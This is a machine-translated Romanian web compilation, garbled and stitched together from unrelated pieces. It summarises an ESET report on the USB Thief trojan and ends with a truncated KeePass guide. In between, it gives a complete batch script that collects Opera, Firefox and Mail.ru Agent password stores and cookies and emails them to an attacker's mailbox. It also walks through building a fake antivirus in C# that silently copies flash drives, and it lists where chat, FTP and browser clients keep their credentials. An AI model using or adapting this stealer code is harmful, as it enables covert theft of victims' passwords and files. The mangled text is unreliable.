Cea mai simplă grabă de unitate flash. Trojan Thief USB nu lasă urme și lucrările pe unitățile flash cum să fure datele printr-o unitate flash USB și un registru
Troyan extrem de neobișnuit: Malwar a primit numele Thief USB (Win32 / Psw.Stealer.nai). MALNAME se concentrează pe furtul de date, se aplică și funcționează pe unități de flash obișnuite, precum și ascunde îndemânarea urmelor prezenței sale în sistem. Troyan este ideal pentru cybershpionaj, deoarece este capabil să fie chiar izolat de sistemele de rețea, dacă puteți conecta o unitate USB la ele.
Spre deosebire de alte amenințări USB care sunt scrise în comenzile rapide ale Autoload și Fake Applications, astfel încât Malwar să fie pornit, hoțul USB acționează altfel. Activitatea Trojanului este concepută pentru faptul că utilizatorii sunt adesea stocați pe versiunile portabile ale unor astfel de aplicații precum Firefox, Notepad ++, Truescrypt și așa mai departe. Malwar este încorporat într-un lanț de descărcare a unor astfel de programe, emiterea pentru un fișier plugin sau dll. Astfel, atunci când utilizatorul pornește aplicația familiară de la unitatea flash, împreună cu ea (în fundal), este lansat Troyan.
Autorul necunoscut al Malviva a abuzat o protecție serioasă pentru dezvoltarea sa. Thieful USB este legat de fiecare unitate flash infectată utilizând ID-ul său unic și parametrii de antrenare. O parte din fișierele troiene sunt protejate de criptarea AES128, cu cheia generată tocmai pe baza parametrilor unici ai dispozitivului. De asemenea, numele fișierelor Malvari se rotesc în fiecare caz: sunt generate pe baza conținutului flashplay și timp pentru a crea fișiere. Când încercați să copiați hoțul USB la o altă unitate flash sau un hard disk obișnuit, acest sistem de protecție în două etape nu va da Malvari să câștige și, de asemenea, complică în mod serios comportamentul ingineriei inverse.
Structura troianului.
Thieful USB funcționează direct de pe unitatea flash și nu lasă nici o urmă în sistem. Troyan este alcătuită din șase fișiere, dintre care patru sunt executabile, iar încă două conțin date de configurare. Primul încărcător este responsabil pentru lansarea Trojan împreună cu o versiune portabilă a oricărui program. Se verifică dispozitivul USB și se asigură că poate înregistra informații furate pe ea și să o păstreze aici. Apoi începe cel de-al doilea încărcător. El verifică numele proceselor părinte și se asigură că funcționează într-un mediu comun (și nimeni nu încearcă să-l analizeze). Al treilea încărcător, la rândul său, verifică prezența în sistemul antivirus.
Ultimul, al patrulea Pailad, care este încorporat în procesul de funcționare, este responsabil direct pentru furtul de date. USB Thief răpire documente, imagini, listă de fișiere din toate discurile disponibile, datele de registry Windows și informațiile colectate utilizând Winaudit. Toate datele furate sunt salvate pe unitatea flash și sunt criptate folosind criptografia eliptică.
Experții ESET remarcă faptul că atacurile care utilizează hoțul USB nu pot fi numite practici comune. Cu toate acestea, Troyanul este foarte periculos, deoarece este dificil să se detecteze prezența și după extragerea unei unități USB, nu există urme de alegere a informațiilor să rămână deloc. De asemenea, în raportul companiei afirmă că autorul Malvari, dacă se dorește, poate "reîncărca" malicii sale, înlocuind dyiloadul pentru furtul de date pe orice alt malwar.
În acest articol, voi descrie cât mai repede și fără multă dificultate, scrieți și facem fișierele de focalizare a virusului cu parole și trimiterea acestuia pe căsuța poștală.
Să începem cu faptul că virusul va fi scris pe BAT "E (CMD, comenzile principale pe care le puteți lua), care sunt, în fișierul text obișnuit și vor fi executați utilizând un rotor standard, încorporat al ferestrelor" Linie de comanda ".
Pentru a scrie un virus similar, trebuie să cunoașteți locația de stocare exactă a acelor fișiere care și va fura, componentele BLAT care pot fi descărcate de pe site-ul de pe site-ul http://www.blat.net/ sau de la serverul nostru, precum și o componentă de la Winrar Archiver Rar.exe (puteți face fără ea).
Deschideți notepad și copiați următorul cod acolo:@echo off md% Systemroot% \\ Wincs MD% SystemDrive% \\ Pass \\ MD% SystemDrive% \\ Pass \\ Opera \\ MD% SystemDrive% \\ Pass \\ Mozilla \\ MD% SystemDrive% \\ Pass \\ MAILAGENT \\ MD% SystemDrive% \\ Pass \\ MAILAGENT \\ REG APP% Systemroot% \\ Wincs + H + S + R APP% SystemDrive% \\ Pass + H + S + r Copie / y "% Systemroot% \\ Blat.exe"% Systemroot% \\ wincs \\ blat.exe "Copie / Y "% Systemroot% \\ blat.dll"% Systemroot% \\ wincs \\ blat.dll "Copy / y"% Systemroot% \\ Blat.lib ""% Systemroot% \\ wincs \\ blat.lib "CD / d% AppData% \\ Opera \\ Opera \\ Copy / y Wand.Dat% SystemDrive% \\ pas \\ Opera \\ Wand.Dat Copy / y Cookies4.dat% SystemDrive% \\ pass \\ Opera \\ Cookies4.da Regedit.exe -EA% SystemDrive% \\ Pass \\ MAILAGENT \\ REG \\ AGENT.REG "HKEY_CURRENT_USER \\ Software \\ mail.ru \\ Agent \\ Magent_Logins2 Regedit.exe -EA% SystemDrive% \\ Pass \\ MailAgent \\ Reg \\ agent_3.reg" HKEY_CURRENT_USER \\ Software \\ mail.ru \\ Agent \\ Magent_Logins3 CD / D% AppData% Xcopy MRA \\ Base% SystemDrive% \\ Pass \\ MailAggent / K / H / G / Q / R / S / Y / E\u003e Nul XCOPY MRA \\ ADWAD \\ VER.TXT% SystemDrive% \\ Pass \\ MailAgent / K / h / g / q / r / s / y\u003e nul CD% AppData% \\ Mozill A \\ Firefox \\ profiles \\ *. Implicit \\ copy / y Cookies.sqlite% SystemDrive% \\ pass \\ mozilla \\ cookies.sqlite copie / y key3.db% sistemDrive% \\ pass \\ mozilla \\ key3.db copie / y Signons.Sqlite % SystemDrive% \\ pass \\ mozilla \\ signons.sqlite copie / y% wintir% \\ rar.exe% SystemDrive% \\ pass \\ rar.exe\u003e \u200b\u200bNul Del / S / Q% Systemroot% \\ Rar.exe% SystemDrive% \\ Pass \\ rar.exe a -r% sistemDrive% \\ pass \\ pass.rar% sistemDrive% \\ pass \\ copie / y% sistemDrive% \\ pass \\ pass.rar% Systemroot% \\ wincs \\ pass.rar CD% Systemroot% \\ Wincs % Systemroot% \\ wincs \\ blat.exe -Install -server smtp.yandex.ru -port 587 -F [email protected] -u Login -PW Parola Ren * .rar.rar% Systemroot% \\ wincs \\ blot.exe -BOVEPASSWORD -TO [email protected] -ATTACH% SIDICROOT% \\ Wincs \\ pass.rar Rmdir / s / Q% SystemDrive% \\ Pass Rmdir / S / Q% Systemroot% \\ Wincs Del / S / Q% Systemroot% \\ Blot. Exe Del / S / Q% Systemroot% \\ Blot.dll Del / S / Q% Systemroot% \\ Blat.lib APS + A + S + H + R% Systemroot% \\ Wind.exe Ieșire CLS
Nu este prea mult să scrieți codul batinei în sine.
@echo off - ascunde corpul Batinka (deci nu este necesar, dar totuși)
mD% SystemRoot% \\ Wincs - Creează un folder WINCS în folderul sistemului Windows, indiferent de discul instalat sau așa cum este numit.
mD% SystemDrive% \\ Pass \\ - Creează folderul de trecere de pe discul în care este instalat Windows.
mD% SystemDrive% \\ pas \\ Opera \\ - Creează un dosar de operă unde în viitor va fi copiat cu browserul de operă (până la 11 * versiuni ale Operei stochează parolele în fișierul wand.dat)
- Creează un dosar Mozilla unde fișierele din browserul Mozilla vor continua să fie copiate (cookies.sqlite, key3.db, signonss.sqlite) în care parolele sunt stocate.
mD% SystemDrive% \\ pass \\ MailAgent \\ - Creează un folder MailAgent la care vor fi copiate fișierele care conțin istoricul de corespondență și chei de registry (tastele de parolă) de la agentul de poștă electronică.
mD% SystemDrive% \\ Pass \\ MailAgent \\ Reg - Creează un dosar reg
aPERF% SIDICROOT% \\ Wincs + H + S + R - Pune atributele din dosarul Wincs, ascunzându-l din ochi.
aPERF% SystemDrive% \\ Pass + H + S + R - La fel ca mai sus.
copy / y "% Systemroot% \\ blat.exe"% Systemroot% \\ wincs \\ blat.exe " - Copiază fișierul blat.exe de la descărcarea în dosarul Wincs
copie / y "% Systemroot% \\ blat.dll"% Systemroot% \\ wincs \\ blat.dll " - Copiază fișierul blat.dll de la descărcarea în dosarul Wincs
copie / y "% SystemRoot% \\ blat.lib"% Systemroot% \\ wincs \\ blat.lib " - Copiază fișierul Blat.lib din plugul din dosarul Wincs
CD / D% AppData% \\ Opera \\ Opera \\ - intră în dosarul Opera unde sunt localizate fișierele cu parole (și nu numai) de la Opera.
copie / y wand.dat% SystemDrive% \\ pass \\ Opera \\ wand.dat - Copiază fișierul Wand.Dat la dosarul Opera
copy / Y Cookies4.dat% SystemDrive% \\ Pass \\ Opera \\ Cookies4.dat - Copiază fișierul Cookies4.dat în dosarul Opera
regedit.exe -EA% SystemDrive% \\ pass \\ mailAgent \\ reg \\ agent.reg "hkey_current_user \\ software \\ mail.ru \\ agent \\ mavant_logins2 - exportă cheia de registry MAGENT_LOGINS2 unde parola este stocată în dosarul Reg
regedit.exe -EA% SystemDrive% \\ pass \\ MAILAGENT \\ REG \\ AGENT.REG "HKEY_CURRENT_USER \\ Software \\ mail.ru \\ agent \\ Magent_logins3 - exportă cheia de registry Magent_logins3 unde parola este stocată în dosarul Reg
CD / D% AppData% - Accesați dosarul AppData
Xcopy mra \\ base% sistemDrive% \\ pass \\ mailAgent / k / h / g / q / r / s / y / e\u003e nul - Copiază conținutul dosarului MRA \\ BASE în folderul MAILAGENT
Xcopy mra \\ update \\ ver.txt% sistemDrive% \\ pass \\ mailAgent / k / h / g / q / r / s / y\u003e nul - Copiază fișierul ver.txt în dosarul MAILAGENT
cD% AppData% \\ Mozilla \\ Firefox \\ profiles \\ * Implicit \\ - Du-te la dosarul cu un profil de browser Mozilles
copy / Y Cookies.Sqlite% SystemDrive% \\ pass \\ Mozilla \\ Cookies.Sqlite - Copiază fișierul cookies.sqlite în dosarul Mozilla
copy / y Key3.db% SystemDrive% \\ Pass \\ Mozilla \\ Key3.db - Copiază fișierul Key3.db în dosarul Mozilla
copy / Y Signons.Sqlite% SystemDrive% \\ pass \\ mozilla \\ signons.sqlite - Copiază fișierul Signons.Sqlite în dosarul Mozilla
copie / y% windr% \\ rar.exe% sistemDrive% \\ pass \\ rar.exe\u003e \u200b\u200bnul- Copiază componenta de arhivare Winrar Rar.exe în dosarul de trecere
del / S / Q% Systemroot% \\ rar.exe - Șterge componenta de arhivare din folderul Windows
% SystemDrive% \\ pass \\ rar.exe A -R% SystemDrive% \\ pass \\ pass.rar% SystemDrive% \\ pass \\- Arhiva conținutului dosarului de trecere
copy / y% SystemDrive% \\ pass \\ pass.rar% Systemroot% \\ wincs \\ pass.rar Copiați arhiva creată în dosarul WinCS
cD% SystemRoot% \\ Wincs - Du-te la Wincs Dosar
% Systemroot% \\ wincs \\ blat.exe -Install -server smtp.yandex.ru -port 587 -F [email protected] -u Login -PW Parola - Pregătește programul Blat pentru a trimite arhiva indicând date pentru autorizare și trimitere a literelor. Nu uitați să specificați datele din căsuța poștală, de unde va fi trimisă scrisoarea cu arhiva.
ren * .ra Pass.rar - Doar în cazul în care arhiva nu a acceptat numele greșit în cursul cursului, am redenumit-o pentru a trece.rar
% SystemRoot% \\ Wincs \\ Blat.exe -ble Files Parola - la [email protected]. -Atach% Systemroot% \\ Wincs \\ pass.rar - Indicați ce adresă poștală va fi trimisă de scrisoare și trimite-o.
rMDIR / S / Q% SystemDrive% \\ Pass - Ștergeți folderul de trecere
rMDIR / S / Q% Systemroot% \\ Wincs - Ștergeți folderul WinCS
del / S / Q% Systemroot% \\ blat.exe
del / S / Q% Systemroot% \\ blat.dll - eliminăm componentele BLAT din folderul Windows.
del / S / Q% Systemroot% \\ blat.lib - eliminăm componentele BLAT din folderul Windows.
aPER + A + S + H + R% SISTEMROOT% \\ WING.EXE - Am pus atribute în același mod ascundeți-vă de ochi.
Ieșire - Finalizați procesul Batinka și ieșiți.
cLS - Curățați ieșirea oricăror rânduri din imaj.
Copiat, salvat ca Wind.bat și compilați în Exe Folosind programul de conversie BAT către Exe, apoi colectăm totul într-o grămadă, adică luăm componentele programului Blat și Componenta de arhivare WinRAR (puteți descărca) și lipici Un fișier executabil, sau cu ceea ce un program, calea descărcării tuturor Falams ar trebui să fie% Systeroot% sau% Windowsdir% sau% Wair%.
Ca rezultat, primim un virus care nu va trece prin antivirus și va trimite o arhivă cu fișiere la poștă. Fișierele care vor veni la poștă pot fi decriptate utilizând o recuperare multi-parolă, nu este totul, dar numai Wand.dat de la Opera și apoi dacă nu este actualizat la 11 * versiuni. Toate celelalte fișiere pot fi descifrate prin înlocuirea propriei dvs.
Pe aceasta cred că puteți termina, dacă aveți întrebări, nu ezitați să întrebați.
Vă mulțumim pentru atenția dvs., totul este bun!
© swap theheckworld.in.
Pentru unitățile flash simple - acesta este un dispozitiv pentru transferul de documente / filme / imagini și alte informații personale (și, uneori foarte personale). Dar pentru hackeri, unitatea flash este în același timp o victimă și un instrument de luptă. Astăzi vă voi spune toate subtilitățile de scurgere invizibilă a datelor de la unitățile flash la computerul meu, precum și învață să transforme unitățile flash inofensive pentru a backup parolele de la calculatorul "mare".
Unități flash complete
Ideea programului "Evil comp" va fi după cum urmează. Vom dezvolta un instrument mic care se va preface că este Super Mega Antivirus avansat, scopul căruia este o eliminare calitativă din virușii "periculoși" de la unitățile flash. Nimeni nu va surprinde pe nimeni infectat cu virușii intermitenți, astfel încât "antivirusul nostru specializat" nu va provoca temeri ale utilizatorului gullibil. Dimpotrivă, introduceți o mișcare flash în computer și vedeți un tip de mesaj: "Un virus este descoperit. Fac o scanare detaliată a tuturor fișierelor pentru prezența infectată "- El va aștepta cu siguranță finalizarea acestei operațiuni.
Pregătirea instrumentelor
Scrieți un astfel de program util Vom fi la Trendy acum C #. Flexibilitatea limbii și funcționalitatea platformei largi. Vă permite să dezvoltați aplicații cu viteza fulgerului. De asta avem nevoie. Suntem interesați de cultura pe care o putem colecta și nu procesul de codificare.
Una dintre componentele importante ale aplicației noastre va fi o interfață. Cu cât o faceți mai solid, cu atât mai multe șanse ca victima să nu observe trucul și să se aștepte calm la finalizarea scanării anti-virus. Nu am avut în special abur și am postat o imagine și o bară de progres pe forma unui proiect curat. Puteți să luați de la plin și să faceți un design uluitor. Vă sfătuiesc să vedeți execuția unor antivirus reali și aproximativ în același stil pentru a vă emite cererea.
Am pus sarcina
Presupunem că am decis cu probleme organizaționale și algoritmul acțiunilor, este timpul să discutăm nuanțele tehnice. Deci, antivirusul nostru ar trebui să înceapă munca lor murdară în timpul instalării unității flash. De îndată ce noul disc apare în sistem, programul nostru trebuie să determine scrisoarea sa și să înceapă copierea.
Înainte de a-mi angaja să scriu acest articol, codul sursă al unui program similar mi-a fost prins ochii. Autorul exemplului a determinat prezența unei unități flash prin stingerea periodică a tuturor discurilor pentru prezența unei unități de tip "mediu detașabil". La început m-am gândit să merg la fel, dar vocea interioară sugerată în iraționalitate. Având toate "pentru" și toate "bine, este pe", am aruncat această idee și am mers să merg pe MSND. Cinci minute mai târziu sa dovedit că nu am făcut-o în zadar. Răspunsul a fost găsit!
Fără Winapi nicăieri ...
Puteți afla mai eficient la conectarea echipamentelor noi (în cazul nostru - unitățile flash) prin prinderea și analizarea mesajului WM_DeviceChange. În timpul instalării dispozitivului, mesajul este trimis la toate ferestrele și le putem procesa cu ușurință în aplicația dvs. Pentru aceasta, este suficient doar pentru a descrie funcția WindowProc. În practică, se pare că:
Lresult Callback Windowproc (HWND HWND, // UINT UMSG ID fereastră, // identificatorul mesajului WPARAM WPARAM, // eveniment care a avut loc LPARAM LPARAM // Pointer la structura care conține date)
În corpul funcției, trebuie să comparați valoarea parametrului WPARAM cu identificatori de diverse evenimente legate de WM_DeviceChange. Pentru exemplul nostru, va fi:
Bine, cum să stabiliți faptul că ați conectat echipamentul nou, știm, dar cum să vă asigurați că ați conectat unitatea flash? Dispozitive cu posibilitatea unei "conexiuni la cald" (sunt despre USB) Un set imens (imprimantă, scaner, modem etc.). Din fericire, și această problemă este rezolvată destul de simplă. Prin parametrul LPARAM, ne putem referi la structura _dev_broadcast_hdr, care are un câmp DBCH_Devicype. Acest lucru, pe baza valorii, acestea sunt câmpuri și se fac concluzii adecvate. Dacă este egal cu Dev_devtyp_volume, atunci timpul să vă alăturați și să vă bateți mâinile - o unitate flash este conectată la noi!
TypeDef struct _dev_broadcast_hdr (DBCH_Size; // DWORD DBCH_DEVICETYPE Dimensiunea structurii; // dword dbch_rerding; // rezervat, rezervat, neutilizat) dev_broadcast_hdr, * pdev_broadcast_hdr;
În păsărică introdusă o unitate flash, "vom încerca să recunoaștem scrisoarea discului pe care sistemul a dispărut. Ca și în "domeniul miracolelor", puteți să o ghiciți, dar este mai bine să scoateți informații de la structura Dev_broadcast_volume.
TypeDef struct _dev_broadcast_volume (dword dbcv_size; // DWORD DGVV_DEVICETYPE Dimensiunea structurii; // DWORD DWORD TYPIEL; // Rezervat DWORD DWORD DBCV_UNITMASK; // Bit Mask Letter Word dbcv_flags; //) dev_broadcast_volume, * pdev_broadcast_volume;
Dintre toate domeniile acestei structuri, suntem interesați de DBCV_UNITMASKMASK. Pentru a ține minte că această proprietate conține doar litere biți, și nu performanța sa simbolică. De exemplu, dacă valoarea este 0, litera de unitate va fi a; Dacă 1, atunci B, etc. Pentru comoditatea obținerii unei scrisori de caracter, este mai bine să scrieți o funcție.
Dacă ați citit titlul de mult timp și este familiarizat cu funcțiile API, atunci în citirea următoarei părți a articolului nu este nevoie. Deschideți editorul și începeți aplicația. Am descris toate structurile și funcțiile necesare; Le puteți aduna în program. Definiți și voi începe imersia lui V.Net și C # în special.
Stay.net "om.
Timp pentru a practica și a aplica cunoștințele la limba C #. "Ce naiba? - Te întrebi. "Stramă-urile au spus despre Winapi și apoi am decis prost să fac o cerere pentru toate funcțiile sub forma unui cod nativ? Unde este viteza de dezvoltare a fulgerului declarat? ".
În ceva ce ai dreptate. Aplicația noastră va folosi cu adevărat funcții WinAPI (este mai ușoară), dar nu le vom descrie. Mulți dezvoltatori s-au confruntat cu problema definirii unităților flash. Ca rezultat al acestor skit-uri, clasele gratuite pentru C # au început să apară, în care toate funcționalitățile necesare sunt deja implementate. Trebuie doar să conectăm o astfel de piesă de lucru (citiți componenta) la proiectul dvs. și să provocăm o pereche de metode. Vom folosi una din aceste clase acum. Dar cunoașterea structurilor descrise mai sus, vă veți fi utile atunci când vă transferați acest program în Windows API.
Clasele gata făcute decisive astfel de sarcini, un set excelent, dar mi-a plăcut opțiunea de la Jan Dolinay. Această persoană a scris foarte ușor de utilizat și de a înțelege codul clasei DriveDetector, care poate:
Și cel mai important, cu această clasă este extrem de ușor să lucrați - în acest lucru acum vă asigurați. Conectarea unei clase la proiectul său este efectuată într-un mod standard și nu este oprit în acest sens. Prin urmare, să ne mișcăm imediat la inițializare. Se face așa:
Flashdrivetector \u003d noul drivestector (); FlashDrivetector.DevicearRiverVed + \u003d New DriveDetTortingHandler (ONDRIVERVAD); FlashDrivetector.deviceremoved + \u003d Noul drivestectorementHandler (OnDrivemonded);
După crearea unei instanțe a obiectului de clasă DriveDetector, definesc manipulatorii de evenimente Deviearrive () și DriveMoved (). În funcție de numele lor, nu este dificil să ghiciți ce răspund. Toate codurile de inițializare este cel mai bine scris în metoda FORM1 (). Principalul cod al programului nostru va fi în manipulatorul evenimentului dispozitivului. Veți vedea textul său pe baterea:
String dirname \u003d mediul.getcommandlineargs () + "flash_" + datetime.now.tostring ("dd-mm-yy-hh-mm-ss"); Crearerectorie (dirname); XDirectory FlashCopier \u003d nou XDirectory (); FlashCopier.IndexComplete + \u003d New IndexCompleteeventHandler (index complicat); FlashCopier.IteMCopied + \u003d New itemsCopiedeventHandler (articole dosare); FlashCopier.CopyComplete + \u003d New CopyCompleteeventHandler (Copycomplete); FlashCopier.Source \u003d noul directoryInfo (E.Drive.tostring ()); FlashCopier.Desticitare \u003d New DirectoryInfo (DIRNAME); FlashCopier.OverWrite \u003d Adevărat; Flashcopier.folderfilter \u003d "*"; Flashcopier.Filefilters.Add ("*. Doc"); FlashCopier.Filefilters.Add ("* xls"); // definirea altor filtre // .... Flashcopier.SartCopy ();
La începutul înregistrării, voi defini calea către dosarul în care vom copia conținutul unității flash. Copierea va fi în directorul "Flash_text Data", situat cu dosarul din care rulează aplicația noastră este atât de convenabilă. Decizia de numele dosarului, încerc să o creez folosind funcția creată (). Am scris această caracteristică exclusiv pentru comoditate. Se întâmplă în ea o instanță a obiectului directinician, concepută pentru a lucra cu directoare și a apelat la metoda creată (), ceea ce creează un nou dosar.
După crearea unui dosar, puteți copia. Voi copia toate fișierele utilizând un obiect tip XDirectory. Dacă introduceți codul din listarea dvs., atunci când încercați să compilați compilatorul, compilatorul va produce o eroare în care se va spune negru în alb: "Obiectul acestui tip nu este găsit".
Faptul este că xdirectorul este o clasă terță parte. Odată cu mult timp în urmă am găsit-o pe internet ineta și de atunci adesea folosesc adesea în proiectele mele. Îmi place acest lucru în faptul că este suficient să numiți o metodă pentru a copia dosarele investite. În plus, vă permite să instalați filtre.
Într-adevăr fără ea. Luăm clase standard, binecunoscute tuturor programatorilor recepție - recurs - și scrie câteva linii de cod de cod. Din păcate, nu vreau să fac acest lucru categoric. În curtea secolului XXI, trebuie să vă optimizați acțiunile și XDirectorul pentru a ne ajuta în acest sens.
Modulul cu clasa se află cu discul nostru și puteți afla despre scopul metodelor / proprietăților / evenimentelor, analizând tabelul corespunzător.
Proprietăți de clasă XDirectory
Metode de clasă XDirectory.
Încercați să rulați aplicația și să introduceți o unitate flash USB. După câteva secunde (în funcție de cuișoarele unității flash), întregul conținut al unității USB sa mutat în dosarul din care ați lansat o aplicație proaspăt coaptă.
USB Grabber.
Acum luați în considerare sarcina opusă și discutați despre nuanțele creării așa-numitelor. Flashki Grabber. Principiul creării exact la fel. Trebuie să scrieți o aplicație simplă care va începe automat după instalarea unității flash.
În timpul operațiunii, aplicația va fi răutăți de cuvintele cheie de registry / cuvintele cheie în care programele populare stochează parolele salvate și pot fi copiate pe unul dintre folderele lor cât mai mult posibil. Pentru ca directorul dvs. auto să provoace suspiciunea unui utilizator sărac, vă faceți griji pentru a masca bine. De exemplu, în meniul de lansare.
Probabil că știți că așa-numita versiune portabilă a aplicațiilor au devenit acum foarte populară, adică programele pot lucra direct de pe unitatea flash. Cel mai bine este să jucați. Formarea unui program în stilul corespunzător și pentru adevăr, aruncați mai multe butoane concepute pentru a rula orice programe. Opțiunea mea de proiectare este afișată în imagine.
Cum vom jefui?
Voi spune imediat că acțiunile super-hacker nu trebuie să facă aici. Cele mai multe programe stochează datele personale în documentele și setările \\ datele de utilizare \\ Application \\% Nume de programare sau în registru. Sub numele programului implică orice program. Dacă întâlniți prima opțiune, va trebui să utilizați clasa XDirectory deja familiară (sau metodele standard de lucru cu fișiere) și copiați tot ce aveți nevoie cu acesta. În al doilea caz, va trebui să lucrați cu registrul. Un exemplu de copiere a fișierelor nu va face față (am luat în considerare deja), dar cum să interacționeze cu instrumentele de registry .NET - acum voi arăta (pe exemplul de determinare a calea către dosarul TC):
RegistryKey readkey \u003d registry.currentuser.oscubede ("software \\\\ ghisler \\\\ comandantul total"); String cheie \u003d (șir) readkey.geTValue ("Installdir");
Asta e tot. Codul nu va mai fi. Aceste cunoștințe ar trebui să fie suficiente pentru a trage fișiere cu informații valoroase. Pentru a face o mică sarcină de relief, am pregătit o listă cu cele mai populare programe și am pictat toate căile prin care stochează datele de utilizator salvate.
Mail.Agent.
Mail.ru Messenger este acum foarte popular în rândul utilizatorilor mortali obișnuiți (în special la femeie). Obiectivele sunt clare, sarcinile sunt livrate, așa că suntem interesați de:
gtalk.
Companie Google Creează produse convenabile și funcționale, printre care există un client Gabber - gtalk.. Azi gtalk. Nu foarte popular. La fiecare al doilea PC, acesta nu este instalat, dar uneori se găsește și de a fi în acest subiect, este mai bine să învățăm imediat programul nostru de a obține parole și de la acest Mesianger. Parolele din toate conturile GTalk Store în Registry - Hhey_current_user \\ Software \\ Google \\ Google Talk \\ Conturi. În acest subiect, toate conturile sunt enumerate în cadrul cărora intrarea a fost făcută vreodată gtalk.. Parolele la cont sunt înregistrate în parametrul șirului PW.
Comandantul total.
Comandantul total. - Desigur, cel mai popular manager de fișiere. Funcțiile din program conține o mașină aproximativă și un coș mic (și câte mulți pot fi montați la el cu pluginuri suplimentare). Suntem interesați doar la clientul FTP încorporat. Utilizează multe și parole, desigur, rețin.
TC Spre deosebire de multe alte programe nu stochează parole în registru, iar vechile fișiere INI folosită. Parole, precum și toate datele necesare pentru conectarea la servere (IP, Port, nume de utilizator etc.) Comandantul total. Magazine în fișier wcx_ftp.ini.care este inocent situat în dosarul programului. Calea către directorul în care este instalat Comandantul total.Puteți învăța din registru. Ploy în filiala HKEY_CURRENT_USER \\ Software-ul \\ Ghisler \\ Total Commander.
Firefox.
Astăzi, browser-ul nu este doar un program pentru călătorii web, ci o combinație întreagă, care, pe lângă o varietate de oportunități, păstrează o mulțime de informații confidențiale. Un exemplu tipic este o formă web. 99% din site-urile moderne necesită înregistrare. Amintiți-vă și păstrați în mod constant în capul dvs. de conectare / parolă pentru fiecare site - sarcina este ireal, mai ales dacă sunteți un utilizator avansat și surfingul Internetului nu vă limitați la un "colegii de clasă" și "Vkontakte".
Dezvoltatorii au facilitat viața utilizatorilor și încorporați așa-numitele "depozite de parole" în programe. Am înregistrat, am intrat sub contul meu, am comandat browser-ul să-și amintească acreditările - și am uitat. Data viitoare când ați vizitat doar efectuați câteva clicuri cu mouse-ul și sunteți deja pe site. Deoarece browserul își păstrează parolele, înseamnă că avem posibilitatea de a-și trage toată baza.
Toate aceste fișiere sunt localizate în documentul și setările dvs. deja familiare \\% Nume utilizator% \\ Aplicație Data \\ Mozilla \\ Firefox \\ profiles \\% Nume profil%.
Operă.
Operă. - Browser, care este foarte popular în rândul utilizatorilor ruși. Firește, nu putem lăsa fără atenție. Deci, cu Opera, situația este aproximativ aceeași ca și cu Firefox. Toate parolele stocate în browser sunt stocate la document și setări \\% username% \\ Aplicație Data \\ Opera \\ Profil în fișierul wand.dat. Se pare că Opera este detectată, vom acționa, precum și în cazul Firefox..
Skype.
Popularitatea Skype crește în fiecare zi. Multe dintre acestea sunt folosite ca un mijloc de a face apeluri, ci pentru un chat convenabil banal. Toate datele intime, după cum doriți, sunt situate în profilul utilizatorului (acolo, unde stochează opera sau FF). Pentru "privatizarea" lor va trebui să copieze profilul utilizatorului din Document și Setări \\% nume de utilizator% \\ Application Data \\ Skype \\ și exportați sucursala de registry - HKEY_CURRENT_USER \\ Software \\ Skype \\ Protejectați-vă.
Qip.
Ca majoritatea programelor descrise anterior, Qip toate parolele salvate magazine în datele aplicației \\ qip.
Copierea completă
Tehnologia .Net sa simplificat puternic sarcina, ca urmare a cărora întreaga codificare a fost tăiată într-un apel la mai multe metode. Desigur, puteți spune că nu este rece și că astfel de lucruri sunt mai eficiente să scrie pe Winapi sau ASM "E. În ceva, sunt de acord cu dvs., dar luând în considerare, pe Winapi și, în plus, pe ASME Pentru a scrie un astfel de program, astfel încât nu va fi capabil să fie rapid rapid. În timp ce alții scriu un cod de kilometru, vom colecta recolta. Mult noroc în programare și dacă aveți întrebări, vă întreb, scrieți pe săpun.
Nu uitați, mulți utilizatori stochează informații confidențiale în dosarul Documente My. La minimum, pot exista documente de lucru interesante și, uneori, fișierele întregi cu parole. Eu la timpul meu (pe fosta lucrare) am descoperit un fișier formatat ordonat cu parole clienților pe un compartiment.
Ca prieten adevărat, ar trebui să ajuți toți acești oameni cu o copie de rezervă a informațiilor confidențiale.
Pe multe forumuri hacker, multe anunțuri pentru vânzarea de software de acest fel. Diferite prețuri - de la 10 până la 100 $. Îmbunătățirea exemplelor luate în considerare în articol, puteți câștiga pe crusta de pâine neagră cu caviar. Repet, principalul lucru de a merge la caz creativ și totul va funcționa cu siguranță. Din nou, antivirusurile nu sunt detectate;).
Avertizare!
Folosim acest program exclusiv pentru copierea de rezervă a conținutului unităților flash pe parolele discului și de rezervă de pe unitatea flash USB. Și ce credeai? Utilizarea ilegală a unui astfel de software este pedepsită!
Multe companii, inclusiv Sony și Adobe, au devenit deja victime ale hackerii care au furat milioane de parole și alte date despre utilizatori. O analiză a acestor informații a arătat că mulți utilizatori utilizează adesea parole nesigure, cum ar fi "123456", sau aceeași parolă pentru multe servicii. În mod extrem de facilitează hackerii sarcinii lor și, în același timp, o astfel de neglijență poate fi înțeleasă: cine își poate aminti mai mult de o duzină de parole dificile?
O soluție simplă poate fi o bucată de hârtie lipită sub tastatură. Nici un hacker nu poate mânca la el, dar va trebui să monitorizați în mod constant oamenii din apropierea computerului. Și din această foaie nu există nici o utilizare dacă doriți să introduceți contul dvs. cu computerul altcuiva.
Instrumentul portabil gratuit Beekass 2 rezolvă această dilemă. Pentru munca sa, veți avea nevoie doar de o unitate flash USB cu 10 MB de spațiu liber la care instalați un program auxiliar. În viitor, va trebui să vă amintiți doar o singură parolă - din zona protejată a unității flash. La urma urmei, menține datele de păstrare pentru a introduce serviciile dvs. web sub forma unei bănci de date codificate protejată de parola principală.
Troyans, luând parole, nu vor putea ridica nimic. Și din moment ce nu mai trebuie să păstrați în memoria de zeci de parole, puteți utiliza unul nou pentru fiecare serviciu web, o parolă foarte fiabilă. Acum vă vom spune în detaliu cum să utilizați Weartass.
Cum să o facă
1 Instalați parola în siguranță
Instalați parola în siguranță
Introduceți unitatea flash USB în PC, creați un nou dosar pe acesta și copiați conținutul arhivei cu software-ul de amplasare acolo. Rulați programul Keepass.exe. După pornire, activați căutarea automată a actualizărilor făcând clic pe fereastra pop-up pentru a "activați". Apoi selectați "Vizualizare | Schimbați limba și faceți clic pe "Obțineți mai multe limbi".
Descărcați fișierul de limbă rusă de pe site-ul de deschidere făcând clic pe «Rusă | 2.25+. " Despachetați conținutul arhivei la unitatea USB. Re-faceți clic pe "Vizualizare | Schimbați limba, "Selectați" Russia "și reporniți Weekass apăsând butonul" Da ".
2 Creați o bază de date nouă de parolă
Creați o bază de date nouă de parolă
Selectați "Fișier | Nou "și specificați o unitate USB ca stocare a parolei. În fereastra următoare, programul vă va solicita să setați parola principală. Acesta va trebui să fie introdus de fiecare dată când începe păstrarea.
3 Activați modul protejat
Activați modul protejat
